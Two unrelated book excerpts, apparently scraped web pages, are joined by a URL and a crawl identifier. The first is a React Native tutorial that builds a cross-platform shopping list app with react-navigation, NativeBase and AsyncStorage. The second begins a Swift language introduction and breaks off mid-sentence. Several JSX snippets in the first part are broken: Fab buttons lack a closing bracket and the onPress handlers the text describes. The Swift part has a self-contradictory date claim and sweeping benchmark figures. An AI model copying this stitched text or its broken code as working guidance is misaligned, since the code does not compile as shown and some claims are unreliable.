Most of the modern languages and frameworks used to present a to-do list as their sample app. It is a great way to understand the basics of a framework as user interaction, basic navigation, or how to structure code. We'll start in a more pragmatic way: building a shopping list app. You will be able to develop this app in React Native code, build it for both iOS and Android, and finally install it on your phone. This way, you could not only show your friends what you built, but also understand missing features that you can build by yourself, thinking about user-interface improvements, and above all, motivating yourself to keep learning React Native as you feel its true potential. By the end of this chapter, you will have built a fully-functional shopping list that you can use on your phone and will have all the tools you need to create and maintain simple stateful apps. One of the most powerful features of React Native is its cross-platform capabilities; we will build our shopping list app for both iOS and Android, reusing 99% of our code. Let's take a look at how the app will look on both platforms: iOS: After adding more products, this is how it will look: Android:  After adding more products, this is how it will look: The app will have a very similar user interface on both platforms, but we won't need to care much about the differences (for example, the back button on the Add a product screen), as they will be handled automatically by React Native. It is important to understand that each platform has its own user interface patterns, and it's a good practice to follow them. For example, navigation is usually handled through tabs in iOS while Android prefers a drawer menu, so we should build both navigation patterns if we want happy users on both platforms. In any case, this is only a recommendation, and any user interface pattern could be built on every platform. In later chapters, we will see how to handle two different patterns in the most effective way within the same codebase. The app comprises of two screens: your shopping list and a list of the products which could be added to your shopping list. The user can navigate from the Shopping List screen to the Add a product screen through the round blue button and back through the < Back button. We will also build a clear button in the shopping list screen (the round red button) and the ability to add and remove products on the Add a product screen. We will be covering the following topics in this chapter: - Folder structure for a basic React Native project - React Native's basic CLI commands - Basic navigation - JS debugging - Live reloading - Styling with NativeBase - Lists - Basic state management - Handling events AsyncStorage - Prompt popups - Distributing the app React Native has a very powerful CLI that we will need to install to get started with our project. To install, just run the following command in your command line (you might need to run this with sudo), if you don't have enough permissions: npm install -g react-native-cli Once the installation is finished, we can start using the React Native CLI by typing react-native. To start our project, we will run the following command: react-native init --version="0.49.3"GroceriesList This command will create a basic project named GroceriesList with all the dependencies and libraries you need to build the app on iOS and Android. Once the CLI has finished installing all the packages, you should have a folder structure similar to this: The entry file for our project is index.js. If you want to see your initial app running on a simulator, you can use React Native's CLI again: react-native run-ios Or react-native run-android Provided you have XCode or Android Studio and Android Simulator installed, you should be able to see a sample screen on your simulator after compilation: We have everything we need to set up to start implementing our app, but in order to easily debug and see our changes in the simulator, we need to enable two more features: remote JS debugging and live reloading. For debugging, we will use React Native Debugger, a standalone app, based on the official debugger for React Native, which includes React Inspector and Redux DevTools. It can be downloaded following the instructions on its GitHub repository (). For this debugger to work properly, we will need to enable Remote JS Debugging from within our app by opening a React Native development menu within the simulator by pressing command + ctrl + Z on iOS or command + M on Android. If everything goes well, we should see the following menu appear:   Now, we will press two buttons: Debug Remote JS and Enable Live Reload. Once we are done with this, we have all our development environment up and ready to start writing React code. Our app only comprises of two screens: Shopping List and Add Products. Since the state for such a simple app should be easy to manage, we won't add any library for state management (for example, Redux), as we will send the shared state through the navigation component. This should make our folder structure rather simple: We have to create an src folder where we will store all our React code. The self-created file index.js will have the following code: /*** index.js ***/ import { AppRegistry } from 'react-native'; import App from './src/main'; AppRegistry.registerComponent('GroceriesList', () => App); In short, these files will import the common root code for our app, store it in a variable named App and later pass this variable to the AppRegistry through the registerComponent method. AppRegistry is the component to which we should register our root components. Once we do this, React Native will generate a JS bundle for our app and then run the app when it's ready by invoking AppRegistry.runApplication. Most of the code we will be writing, will be placed inside the src folder. For this app, we will create our root component ( main.js) in this folder, and a screens subfolder, in which we will store our two screens ( ShoppingList and AddProduct). Now let's install all the initial dependencies for our app before continue coding. In our project's root folder, we will need to run the following command: npm install Running that command will install all the basic dependencies for every React Native project. Let's now install the three packages we will be using for this specific app: npm install native-base --save npm install react-native-prompt-android --save npm install react-navigation --save Further ahead in this chapter, we will explain what each package will be used for. Most mobile apps comprise of more than one screen, so we will need to be able to "travel" between those screens. In order to achieve this, we will need a Navigation component. React Native comes with a Navigator and a NavigatorIOS component out of the box, although the React maintainers recommend using an external navigation solution built by the community named react-navigation (), which is very performant, well maintained, and rich in features, so we will use it for our app. Because we already installed our module for navigation ( react-navigation), we can set up and initialize our Navigation component inside our main.js file: /*** src/main.js ***/ import React from 'react'; import { StackNavigator } from 'react-navigation'; import ShoppingList from './screens/ShoppingList.js'; import AddProduct from './screens/AddProduct.js'; const Navigator = StackNavigator({ ShoppingList: { screen: ShoppingList }, AddProduct: { screen: AddProduct } }); export default class App extends React.Component { constructor() { super(); } render() { return <Navigator />; } } Our root component imports both of the screens in our app ( ShoppingList and AddProduct) and passes them to the StackNavigator function, which generates the Navigator component. Let's take a deeper look into how StackNavigator works. StackNavigator provides a way for any app to transition between screens, where each new screen is placed on top of a stack. When we request the navigation to a new screen, StackNavigator will slide the new screen from the right and place a < Back button in the upper-right corner to go back to the previous screen in iOS or, will fade in from the bottom while a new screen is placing a <- arrow to go back in Android. With the same codebase, we will trigger familiar navigation patterns in iOS and Android. StackNavigator is also really simple to use, as we only need to pass the screens in our apps as a hash map, where the keys are the names we want for our screens and the values are the imported screens as React components. The result is a <Navigator/> component which we can render to initialize our app. React Native includes a powerful way to style our components and screens using Flexbox and a CSS-like API but, for this app, we want to focus on the functionality aspect, so we will use a library including basic styled components as buttons, lists, icons, menus, forms, and many more. It can be seen as a Twitter Bootstrap for React Native. There are several popular UI libraries, NativeBase and React Native elements being the two most popular and best supported. Out of these two, we will choose NativeBase, since it's documentation is slightly clearer for beginners. You can find the detailed documentation on how NativeBase works on their website (), but we will go through the basics of installing and using some of their components in this chapter. We previously installed native-base as a dependency of our project through npm install but NativeBase includes some peer dependencies, which need to be linked and included in our iOS and Android native folders. Luckily, React Native already has a tool for finding out those dependencies and linking them; we just need to run: react-native link At this point, we have all the UI components from NativeBase fully available in our app. So, we can start building our first screen. Our first screen will contain a list of the items we need to buy, so it will contain one list item per item we need to buy, including a button to mark that item as already bought. Moreover, we need a button to navigate to the AddProduct screen, which will allow us to add products to our list. Finally, we will add a button to clear the list of products, in case we want to start a new shopping list: Let's start by creating ShoppingList.js inside the screens folder and importing all the UI components we will need from native-base and react-native (we will use an alert popup to warn the user before clearing all items). The main UI components we will be using are Fab (the blue and red round buttons), List, ListItem, CheckBox, Text, and Icon. To support our layout, we will be using Body, Container, Content, and Right, which are layout containers for the rest of our components. Having all these components, we can create a simple version of our ShoppingList component: /*** ShoppingList.js ***/ import React from 'react'; import { Alert } from 'react-native'; import { Body, Container, Content, Right, Text, CheckBox, List, ListItem, Fab, Icon } from 'native-base'; export default class ShoppingList extends React.Component { static navigationOptions = { title: 'My Groceries List' }; /*** Render ***/ render() { return ( <Container> <Content> <List> <ListItem> <Body> <Text>'Name of the product'</Text> </Body> <Right> <CheckBox checked={false} /> </Right> </ListItem> </List> </Content> <Fab style={{ backgroundColor: '#5067FF' }} <Icon name="add" /> </Fab> <Fab style={{ backgroundColor: 'red' }} <Icon ios="ios-remove" android="md-remove" /> </Fab> </Container> ); } } This is just a dumb component statically displaying the components we will be using on this screen. Some things to note: navigationOptionsis a static attribute which will be used by <Navigator>to configure how the navigation would behave. In our case, we want to display My Groceries List as the title for this screen. - For native-baseto do its magic, we need to use <Container>and <Content>to properly form the layout. Fabbuttons are placed outside <Content>, so they can float over the left and right-bottom corners. - Each ListItemcontains a <Body>(main text) and a <Right>(icons aligned to the right). Since we enabled Live Reload in our first steps, we should see the app reloading after saving our newly created file. All the UI elements are now in place, but they are not functional since we didn't add any state. This should be our next step. Let's add some initial state to our ShoppingList screen to populate the list with actual dynamic data. We will start by creating a constructor and setting the initial state there: /*** ShoppingList.js ***/ ... constructor(props) { super(props); this.state = { products: [{ id: 1, name: 'bread' }, { id: 2, name: 'eggs' }] }; } ... Now, we can render that state inside of <List> (inside the render method): /*** ShoppingList.js ***/ ... <List> { this.state.products.map(p => { return ( <ListItem key={p.id} > <Body> <Text style={{ color: p.gotten ? '#bbb' : '#000' }}> {p.name} </Text> </Body> <Right> <CheckBox checked={p.gotten} /> </Right> </ListItem> ); } )} </List> ... We now rely on a list of products inside our component's state, each product storing an id, a name, and gotten properties. When modifying this state, we will automatically be re-rendering the list. Now, it's time to add some event handlers, so we can modify the state at the users' command or navigate to the AddProduct screen. All the interaction with the user will happen through event handlers in React Native. Depending on the controller, we will have different events which can be triggered. The most common event is onPress, as it will be triggered every time we push a button, a checkbox, or a view in general. Let's add some onPress handlers for all the components which can be pushed in our screen: /*** ShoppingList.js ***/ ... render() { return ( <Container> <Content> <List> {this.state.products.map(p => { return ( <ListItem key={p.id} onPress={this._handleProductPress.bind(this, p)} > <Body> <Text style={{ color: p.gotten ? '#bbb' : '#000' }}> {p.name} </Text> </Body> <Right> <CheckBox checked={p.gotten} onPress={this._handleProductPress.bind(this, p)} /> </Right> </ListItem> ); })} </List> </Content> <Fab style={{ backgroundColor: '#5067FF' }} </Fab> <Fab style={{ backgroundColor: 'red' }} </Fab> </Container> ); } ... Notice we added three onPress event handlers: - On <ListItem>, to react when the user taps on one product in the list - On <CheckBox>, to react when the user taps on the checkbox icon next to every product in the list - On both the <Fab>buttons If you know React, you probably understand why we use .bind in all our handler functions, but, in case you have doubts, .bind will make sure we can use this inside the definition of our handlers as a reference to the component itself instead of the global scope. This will allow us to call methods inside our components as this.setState or read our component's attributes, such as this.props and this.state. For the cases when the user taps on a specific product, we also bind the product itself, so we can use them inside our event handlers. Now, let's define the functions which will serve as event handlers: /*** ShoppingList.js ***/ ... _handleProductPress(product) { this.state.products.forEach(p => { if (product.id === p.id) { p.gotten = !p.gotten; } return p; }); this.setState({ products: this.state.products }); } ... First, let's create a handler for when the user taps on a product from our shopping list or in its checkbox. We want to mark the product as gotten (or unmark it if it was already gotten), so we will update the state with the product marked properly. Next, we will add a handler for the blue <Fab> button to navigate to the AddProduct screen: /*** ShoppingList.js ***/ ... _handleAddProductPress() { this.props.navigation.navigate('AddProduct', { addProduct: product => { this.setState({ products: this.state.products.concat(product) }); }, deleteProduct: product => { this.setState({ products: this.state.products.filter(p => p.id !== product.id) }); }, productsInList: this.state.products }); } ... This handler uses this.props.navigation, which is a property automatically passed by the Navigator component from react-navigation. This property contains a method named navigate, receiving the name of the screen to which the app should navigate plus an object which can be used as a global state. In the case of this app, we will store three keys: addProduct: One function to allow the AddProductscreen to modify the ShoppingListcomponent's state to reflect the action of adding a new product to the shopping list. deleteProduct: One function to allow the AddProductscreen to modify the ShoppingListcomponent's state to reflect the action of removing a product from the shopping list. productsInList: A variable holding the list of products is already on the shopping list, so the AddProductsscreen can know which products were already added to the shopping list and display those as "already added", preventing the addition of duplicate items. Handling state within the navigation should be seen as a workaround for simple apps containing a limited number of screens. In larger apps (as we will see in later chapters), a state management library, such as Redux or MobX, should be used to keep the separation between pure data and user interface handling. We will add the last handler for the blue <Fab> button, which enables the user to clear all the items in the shopping list in case you want to start a new list: /*** ShoppingList.js ***/ ... _handleClearPress() { Alert.alert('Clear all items?', null, [ { text: 'Cancel' }, { text: 'Ok', onPress: () => this.setState({ products: [] }) } ]); } ... We are using Alert to prompt the user for confirmation before clearing all the elements in our shopping list. Once the user confirms this action, we will empty the products attribute in our component's state. Let's see how the whole component's structure would look like when putting all the methods together: /*** ShoppingList.js ***/ import React from 'react'; import { Alert } from 'react-native'; import { ... } from 'native-base'; export default class ShoppingList extends React.Component { static navigationOptions = { title: 'My Groceries List' }; constructor(props) { ... } /*** User Actions Handlers ***/ _handleProductPress(product) { ... } _handleAddProductPress() { ... } _handleClearPress() { ... } /*** Render ***/ render() { ... } } The structure of a React Native component is very similar to a normal React component. We need to import React itself and then some components to build up our screen. We also have several event handlers (which we have prefixed with an underscore as a mere convention) and finally a render method to display our components using standard JSX. The only difference with a React web app is the fact that we are using React Native UI components instead of DOM components. As the user will have the need of adding new products to the shopping list, we need to build a screen in which we can prompt the user for the name of the product to be added and save it in the phone's storage for later use. When building a React Native app, it's important to understand how mobile devices handle the memory used by each app. Our app will be sharing the memory with the rest of the apps in the device so, eventually, the memory which is using our app will be claimed by a different app. Therefore, we cannot rely on putting data in memory for later use. In case we want to make sure the data is available across users of our app, we need to store that data in the device's persistent storage. React Native offers an API to handle the communication with the persistent storage in our mobile devices and this API is the same on iOS and Android, so we can write cross-platform code comfortably. The API is named AsyncStorage, and we can use it after importing from React Native: import { AsyncStorage } from 'react-native'; We will only use two methods from AsyncStorage: getItem and setItem. For example, we will create within our screen a local function to handle the addition of a product to the full list of products: /*** AddProduct ***/ ... async addNewProduct(name) { const newProductsList = this.state.allProducts.concat({ name: name, id: Math.floor(Math.random() * 100000) }); await AsyncStorage.setItem( '@allProducts', JSON.stringify(newProductsList) ); this.setState({ allProducts: newProductsList }); } ... There are some interesting things to note here: - We are using ES7 features such as asyncand await to handle asynchronous calls instead of promises or callbacks. Understanding ES7 is outside the scope of this book, but it is recommended to learn and understand about the use of asyncand await, as it's a very powerful feature we will be using extensively throughout this book. - Every time we add a product to allProducts, we also call AsyncStorage.setItemto permanently store the product in our device's storage. This action ensures that the products added by the user will be available even when the operating system clears the memory used by our app. - We need to pass two parameters to setItem(and also to getItem): a key and a value. Both of them must be strings, so we would need to use JSON.stringify, if we want to store the JSON-formatted data. As we have just seen, we will be using an attribute in our component's state named allProducts, which will contain the full list of products the user can add to the shopping list. We can initialize this state inside the component's constructor to give the user a gist of what he/she will be seeing on this screen even during the first run of the app (this is a trick used by many modern apps to onboard users by faking a used state): /*** AddProduct.js ***/ ... constructor(props) { super(props); this.state = { allProducts: [ { id: 1, name: 'bread' }, { id: 2, name: 'eggs' }, { id: 3, name: 'paper towels' }, { id: 4, name: 'milk' } ], productsInList: [] }; } ... Besides allProducts, we will also have a productsInList array, holding all the products which are already added to the current shopping list. This will allow us to mark the product as Already in shopping list, preventing the user from trying to add the same product twice in the list. This constructor will be very useful for our app's first run but once the user has added products (and therefore saved them in persistent storage), we want those products to display instead of this test data. In order to achieve this functionality, we should read the saved products from AsyncStorage and set it as the initial allProducts value in our state. We will do this on componentWillMount: /*** AddProduct.js ***/ ... async componentWillMount() { const savedProducts = await AsyncStorage.getItem('@allProducts'); if(savedProducts) { this.setState({ allProducts: JSON.parse(savedProducts) }); } this.setState({ productsInList: this.props.navigation.state.params.productsInList }); } ... We are updating the state once the screen is ready to be mounted. First, we will update the allProducts value by reading it from the persistent storage. Then, we will update the list productsInList based on what the ShoppingList screen has set as the state in the navigation property. With this state, we can build our list of products, which can be added to the shopping list: /*** AddProduct ***/ ... render(){ <List> {this.state.allProducts.map(product => { const productIsInList = this.state.productsInList.find( p => p.id === product.id ); return ( <ListItem key={product.id}> <Body> <Text style={{ color: productIsInList ? '#bbb' : '#000' }} > {product.name} </Text> { productIsInList && <Text note> {'Already in shopping list'} </Text> } </Body> </ListItem> ); } )} </List> } ... Inside our render method, we will use an Array.map function to iterate and print each possible product, checking if the product is already added to the current shopping list to display a note, warning the user: Already in shopping list. Of course, we still need to add a better layout, buttons, and event handlers for all the possible user actions. Let's start improving our render method to put all the functionality in place. As it happened with the ShoppingList screen, we want the user to be able to interact with our AddProduct component, so we will add some event handlers to respond to some user actions. Our render method should then look something like this: /*** AddProduct.js ***/ ... render() { return ( <Container> <Content> <List> {this.state.allProducts.map(product => { const productIsInList = this.state.productsInList. find(p => p.id === product.id); return ( <ListItem key={product.id} onPress={this._handleProductPress.bind (this, product)} > <Body> <Text style={{ color: productIsInList? '#bbb' : '#000' }} > {product.name} </Text> { productIsInList && <Text note> {'Already in shopping list'} </Text> } </Body> <Right> <Icon ios="ios-remove-circle" android="md-remove-circle" style={{ color: 'red' }} onPress={this._handleRemovePress.bind(this, product )} /> </Right> </ListItem> ); })} </List> </Content> <Fab style={{ backgroundColor: '#5067FF' }} </Fab> </Container> ); } ... There are three event handlers responding to the three press events in this component: - On the blue <Fab> button, which is in charge of adding new products to the products list - On each <ListItem>, which will add the product to the shopping list - On the delete icons inside each <ListItem> to remove this product from the list of the products, which can be added to the shopping list Let's start adding new products to the available products list once the user presses the <Fab> button: /*** AddProduct.js ***/ ... _handleAddProductPress() { prompt( 'Enter product name', '', [ { text: 'Cancel', style: 'cancel' }, { text: 'OK', onPress: this.addNewProduct.bind(this) } ], { type: 'plain-text' } ); } ... We are using here the prompt function from the react-native-prompt-android module. Despite its name, it's a cross-platform prompt-on-a-pop-up library, which we will use to add products through the addNewProduct function we created before. We need to import the prompt function before we use it, as follows: import prompt from 'react-native-prompt-android'; And here is the output: Once the user enters the name of the product and presses OK, the product will be added to the list so that we can move to the next event handler, adding products to the shopping list when the user taps on the product name: /*** AddProduct.js ***/ ... _handleProductPress(product) { const productIndex = this.state.productsInList.findIndex( p => p.id === product.id ); if (productIndex > -1) { this.setState({ productsInList: this.state.productsInList.filter( p => p.id !== product.id ) }); this.props.navigation.state.params.deleteProduct(product); } else { this.setState({ productsInList: this.state.productsInList.concat(product) }); this.props.navigation.state.params.addProduct(product); } } ... This handler checks if the selected product is on the shopping list already. If it is, it will remove it by calling deleteProduct from the navigation state and also from the component's state by calling setState . Otherwise, it will add the product to the shopping list by calling addProduct in the navigation state and refresh the local state by calling setState. Finally, we will add an event handler for the delete icon on each of the <ListItems>, so the user can remove products from the list of available products: /*** AddProduct.js ***/ ... async _handleRemovePress(product) { this.setState({ allProducts: this.state.allProducts.filter(p => p.id !== product.id) }); await AsyncStorage.setItem( '@allProducts', JSON.stringify( this.state.allProducts.filter(p => p.id !== product.id) ) ); } ... We need to remove the product from the component's local state, but also from the AsyncStorage so it doesn't show during later runs of our app. We have all the pieces to build our AddProduct screen, so let's take a look at the general structure of this component: import React from 'react'; import prompt from 'react-native-prompt-android'; import { AsyncStorage } from 'react-native'; import { ... } from 'native-base'; export default class AddProduct extends React.Component { static navigationOptions = { title: 'Add a product' }; constructor(props) { ... } async componentWillMount() { ... } async addNewProduct(name) { ... } /*** User Actions Handlers ***/ _handleProductPress(product) { ... } _handleAddProductPress() { ... } async _handleRemovePress(product) { ... } /*** Render ***/ render() { .... } } We have a very similar structure to the one we built for ShoppingList : the navigatorOptions constructor building the initial state, user action handlers, and a render method. In this case, we added a couple of async methods as a convenient way to deal with AsyncStorage. Running our app on a simulator/emulator is a very reliable way to feel how our app will behave in a mobile device. We can simulate touch gestures, poor network connectivity environments, or even memory problems, when working in simulators/emulators. But eventually, we would like to deploy the app to a physical device, so we could perform a more in-depth testing. There are several options to install or distribute an app built in React Native, the direct cable connection being the easiest one. Facebook keeps an updated guide on how to achieve direct installation on React Native's site (), but there are other alternatives when the time comes to distribute the app to other developers, testers, or designated users. Testflight () is an awesome tool for distributing the app to beta testers and developers, but it comes with a big drawback--it only works for iOS. It's really simple to set up and use as it is integrated into iTunes Connect, and Apple considers it the official tool for distributing apps within the development team. On top of that, it's absolutely free, and it's usage limits are quite large: - Up to 25 testers in your team - Up to 30 devices per tester in your team - Up to 2,000 external testers outside your team (with grouping capabilities) In short, Testflight is the platform to choose when you target your apps only to iOS devices. Since, in this book, we want to focus on cross-platform development, we will introduce other alternatives to distribute our apps to iOS and Android devices from the same platform. Diawi () is a website where developers can upload their .ipa and .apk files (the compiled app) and share the links with anybody, so the app can be downloaded and installed on any iOS or Android device connected to the internet. The process is simple: - Build the .ipa(iOS) / .apk(Android) in XCode/Android studio. - Drag and drop the generated .ipa/ .apkfile into Diawi's site. - Share the link created by Diawi with the list of testers by email or any other method. Links are private and can be password protected for those apps with the higher need of security. The main downside is the management of the testing devices, as once the links are distributed, Diawi loses control over them, so the developer cannot know which versions were downloaded and tested. If managing the list of testers manually is an option, Diawi is a good alternative to Testflight. If we are in need of managing what versions were distributed to which testers and whether they have already started testing the app or not, we should give Installr () a try, since functionality-wise it is quite similar to Diawi, but it also includes a dashboard to control who are the users, which apps were sent to them individually, and the status of the app in the testing device (not installed, installed, or opened). This dashboard is quite powerful and definitely a big plus when one of our requirements is to have good visibility over our testers, devices, and builds. The downside of Installr is its free plan only covers three testing devices per build, although they offer a cheap one-time pay scheme in case we really want to have that number increased. It's a very reasonable option when we are in need of visibility and cross-platform distribution. During the course of this chapter, we learned how to start up a React Native project, building an app which includes basic navigation and handling several user interactions. We saw how to handle persistent data and basic states using the navigation module, so we could transition through the screens in our project. All these patterns can be used to build lots of simple apps, but in the next chapter, we will dive deeper into more complex navigation patterns and how to communicate and process external data fetched from the internet, which will enable us to structure and prepare our app for growing. On top of that, we will use MobX, a JavaScript library, for state management, which will make our domain data available to all the screens inside our app in a very simple and effective way.      Â
https://www.packtpub.com/product/react-native-blueprints/9781787288096
CC-MAIN-2020-40
en
refinedweb
In the 2014, Apple released a new programming language, called Swift. Swift has been designed from scratch with many powerful features. It is statically typed and very safe. It has a clean and nice syntax, it's fast, it's flexible, and it has many other advantages that you will learn later in the book. Swift seems to be very powerful and it has big potential. Apple has set big expectations for Swift, and their main goal for Swift is that it should be a replacement for Objective-C, which is going to happen in the near future. In this chapter, you will become familiar with the Swift programming language, what it was made for, and what its advantages and features are. We will also make our first Swift application and see how easy it is to integrate with existing Objective-C code. In this chapter, we will cover the following topics: Welcome to Swift Writing swift code Swift interoperability The importance of performance and performance key metrics I can guess you opened this book because you are interested in speed and are probably wondering, "How fast can Swift be?" Before you even start learning Swift and discovering all the good things about it, let's answer it right here and right now. Let's take an array of 100,000 random numbers; sort it in Swift, Objective-C, and C using the standard sort function from stdlib ( sort in Swift, qsort in C, and compare in Objective-C); and measure how much time each would take. Sorting an array with 100,000 integer elements gives us this: And the winner is, Swift! Swift is 14.5 times faster than Objective-C and 2.3 times faster than C. In other examples and experiments, C is usually faster than Swift and Swift is way faster than Objective-C. These measurements were done with Xcode 7.0 beta 6 and Swift 2.0. It's important to highlight that the improvements in Swift 2.0 were mainly focused on making it cleaner, more powerful, safer, and more stable, and preparing it for open sourcing. Swift's performance hasn't reached its full potential yet, and the future is so exciting! The Swift programming language has been designed by Apple from the ground up. It was released with the slogan Objective-C without the C. The meaning of this phrase is that Swift doesn't have any limitation of backward compatibilities. It's totally new and with no old baggage. Before you start learning all the power of Swift, I think it would be useful to answer a few questions about why should you learn it, and if you have any doubts about that, I should dispel them. Swift is a very new programming language but it has become very popular and has gained huge traction. However, many iOS and OS X developers ask these questions: Should I learn Swift? What should I learn, Swift or Objective-C? Is Objective-C going to stay or die? Is Swift ready for production apps? Is Swift faster than Objective-C or C? What applications can I write using Swift? My answer is, "Yes. Definitely!" You should learn Swift. It doesn't matter whether you are a new iOS and OS X developer or you have some Objective-C background; you should definitely learn Swift. If you are new developer, then it's really useful to start with Swift, because you will learn programming basics and techniques in Swift, and further Swift learning would be much easier. Although it would definitely useful to learn Objective-C as well, I would recommend learning Swift first so that you build your programming mindset on Swift. If you already have some experience in Objective-C, then you should try Swift as soon as possible. It will not only give you the knowledge of a new programming language, but also open the door to new ideas and ways of solving problems in Objective-C. We can see that Objective-C has started evolving right now because of Swift. Objective-C has many limitations because of its backward capabilities with C. It was created 23 years ago, in 1983, but it will die much sooner than Swift. After the release of Swift version 1.0, in only a year's time we have seen many Swift applications successfully developed and released on the App Store. In this time period, many Swift tools and open source libraries that increase development productivity have been created. During WWDC 2015, Apple announced that Swift will be made open source. This means that Swift can be used to write any software and not only iOS or OS X apps. You can write a piece of server-side code or web app in Swift. This is one more reason you should learn it. On the other hand, we see that Swift is under constant development. There were many changes and improvements in version 1.2, and there were even more changes in version 2.0. Although it's very easy to upgrade to the newer Swift version with the Xcode migrator, it's something you should think about. Swift has some promising performance characteristics. We have seen a huge performance improvement in the Swift 1.2 release, and some improvements in Swift 2.0 as well. You have seen from the previous example how fast Swift is, and in general, Swift has more potential to achieve high performance than Objective-C. Finally, I want to mention a phrase I really like, by Bryan Irace: When the iOS SDK says "Jump", ask "How High?" Don't wait, learn Swift! At this point, you know that you should learn Swift, and you shouldn't have any doubts. Let's take a look what makes Swift so amazing and powerful. Here is a list of a few important features that we are going to cover: Clean and beautiful syntax Type-safe Reach types system Powerful value types A multiparadigm languageâobject-oriented, protocol-oriented, and functional Fast Safe Powerful features and performance are important, but I think that cleanness and beauty are no less important. You write and read code everyday, and it has to be clean and beautiful so that you can enjoy it. Swift is very clean and beautiful, and the following are the main features that make it so. Semicolons were created for the compiler. They help the compiler understand the source code and split it into commands and instructions. But the source code is written for people, and we should probably get rid of the compiler instructions from it: var number = 10 number + 5 // Not recommended var count = 1; var age = 18; age++ There is no need for a semicolon (;) at the end of every instruction. It may seem like a very small feature, but it makes code so much nicer and easier to write and read. You can, however, put semicolons if you want. A semicolon is required when you have two instructions on the same line. There are also some exceptions when you have to use semicolons, a for loop as an example ( for var i = 0; i < 10; i++), but in that context, they are used for a different purpose. With type inference, you don't need to specify the types of variables and constants. Swift automatically detects the correct type from the context. Sometimes, however, you have to specify the type explicitly and provide type annotation. When there is no value assigned to the variable, Swift can't predict what type that variable should be: var count = 10 //count: Int var name = "Sara" //name: String var empty = name.isEmpty //empty: Bool // Not recommended var count: Int = 10 var name: String = "Sara" var empty: Bool = name.isEmpty // When you must provide type annotation var count: Int var name: String count = 10 name = "Sara" In most cases, Swift can understand a variable's type from the value assigned to it. The list of all of Swift's clean code features is very long; here are few of them: closure syntax, functions' default parameter values, functions' external parameter names, default initializers, subscripts, and operators: Clean closure syntax: A closure is a standalone block of code that can be treated as a light unnamed function. It has the same functionality as a function but has a cleaner syntax. You can assign it to a variable, call it, or pass it as an argument to a function. For example, { $0 + 10 }is a closure: let add10 = { $0 + 10 } add10(5) let numbers = [1, 2, 3, 4] numbers.map { $0 + 10 } numbers.map(add10) Default parameter values and external names: While declaring a function, you can define default values for parameters and give them different external names, which are used when you call that function. With default parameters, you can define one function but call it with different arguments. This reduces the need for creating unnecessary functions: func complexFunc (x: Int, _ y: Int = 0, extraNumber z: Int = 0, name: String = "default") -> String{ return "\(name): \(x) + \(y) + \(z) = \(x + y + z)" } complexFunc(10) complexFunc(10, 11) complexFunc(10, 11, extraNumber: 20, name: "name") Default and memberwise initializers: Swift can create initializers for struct and base classes in some scenarios for you. Less code, better code: struct Person { let name: String let lastName: String let age: Int } Person(name: "Jon", lastName: "Bosh", age: 23) Subscripts: This is a nice way of accessing the member elements of a collection. You can use any type as a key: let numbers = [1, 2, 3, 4] let num2 = numbers[2] let population = [ "China" : 1_370_940_000, "Australia" : 23_830_900 ] population["Australia"] You can also define a subscript operator for your own types or extend existing types by adding own subscript operator to them in an extension: // Custom subscript struct Stack { private var items: [Int] subscript (index: Int) -> Int { return items[index] } // Stack standard functions mutating func push(item: Int) { items.append(item) } mutating func pop() -> Int { return items.removeLast() } } var stack = Stack(items: [10, 2]) stack.push(6) stack[2] stack.pop() Operators: These are symbols that represent functionality, for example, the +operator. You can extend your types to support standard operators or create your own custom operators: let numbers = [10, 20] let array = [1, 2, 3] let res = array + numbers struct Vector { let x: Int let y: Int } func + (lhs: Vector, rhs: Vector) -> Vector { return Vector(x: lhs.x + rhs.x, y: lhs.y + rhs.y); } let a = Vector(x: 10, y: 5) let b = Vector(x: 2, y: 3) let c = a + b guard: The guardstatement is used to check whether a condition is met before continuing to execute the code. If the condition isn't met, it must exit the scope. The guardstatement removes nested conditional statements and the Pyramid of Doom problem: Note Read more about the Pyramid of Doom at. func doItGuard(x: Int?, y: Int) { guard let x = x else { return } //handle x print(x) guard y > 10 else { return } //handle y print(y) } As you can see, Swift is very clean and nice. The best way to show how clean and beautiful Swift is is by trying to implement the same functionality in Swift and Objective-C. Let's say we have a list of people and we need to find the people with a certain age criteria and make their names lowercase. This is what the Swift version of this code will look like: struct Person { let name: String let age: Int } let people = [ Person(name: "Sam", age: 10), Person(name: "Sara", age: 24), Person(name: "Ola", age: 42), Person(name: "Jon", age: 19) ] let kids = people.filter { person in person.age < 18 } let names = people.map { $0.name.lowercaseString } The following is what the Objective-C version of this code will look like: //Person.h File @import Foundation; @interface Person : NSObject @property (nonatomic) NSString *name; @property (nonatomic) NSInteger age; - (instancetype)initWithName:(NSString *)name age:(NSInteger)age; @end //Person.m File #import "Person.h" @implementation Person - (instancetype)initWithName:(NSString *)name age:(NSInteger)age { self = [super init]; if (!self) return nil; _name = name; _age = age; return self; } @end NSArray *people = @[ [[Person alloc] initWithName:@"Sam" age:10], [[Person alloc] initWithName:@"Sara" age:24], [[Person alloc] initWithName:@"Ola" age:42], [[Person alloc] initWithName:@"Jon" age:19] ]; NSArray *kids = [people filteredArrayUsingPredicate:[NSPredicate predicateWithFormat:@"age < 18"]]; NSMutableArray *names = [NSMutableArray new]; for (Person *person in people) { [names addObject:person.name.lowercaseString]; } The results are quite astonishing. The Swift code has 14 lines, whereas the Objective-C code has 40 lines, with .h and .m files. Now you see the difference. Swift is a very safe programming language, and it does a lot of security checks at compile time. The goal is to catch as many issues as possible during compiling and not when you run an application. Swift is a type-safe programming language. If you made any mistakes with a type, such as trying to add an Int and a String or passing the wrong argument to a function, you will get an error: let number = 10 let part = 1.5 number + part; // Error let result = Double(number) + part Swift doesn't do any typecasting for you; you have to do it explicitly, and this makes Swift even safer. In this example, we had to cast an Int number to the Double type before adding it. A very important safe type that was introduced in Swift is an optional. An optional is a way of representing the absence of a valueâ nil. You can't assign nil to a variable with the String type. Instead, you must declare that this variable can be nil by making it the optional String? type: var name: String = "Sara" name = nil //Error. You can't assign nil to a non-optional type var maybeName: String? maybeName = "Sara" maybeName = nil // This is allowed now To make a type an optional type, you must put a question mark ( ?) after the type, for example, Int?, String?, and Person?. You can also declare an optional type using the Optional keyword, Optional<String>, but the shorter way with using ? is preferred: var someName: Optional<String> Optionals are like a box that contains some value or nothing. Before using the value, you need to unwrap it first. This technique is called unwrapping optionals, or optional binding if you assign an unwrapped value to a constant: if let name = maybeName { var res = "Name - " + name } else { print("No name") } Swift 2.0 has powerful and very simple-to-use error handling. Its syntax is very similar to the exception handling syntax in other languages, but it works in a different way. It has the throw, catch, and try keywords. Swift error handling consists of a few components, explained as follows: An error object represents an error, and it must conform to the ErrorTypeprotocol: enum MyErrors: ErrorType { case NotFound case BadInstruction } Every function that can throw an error 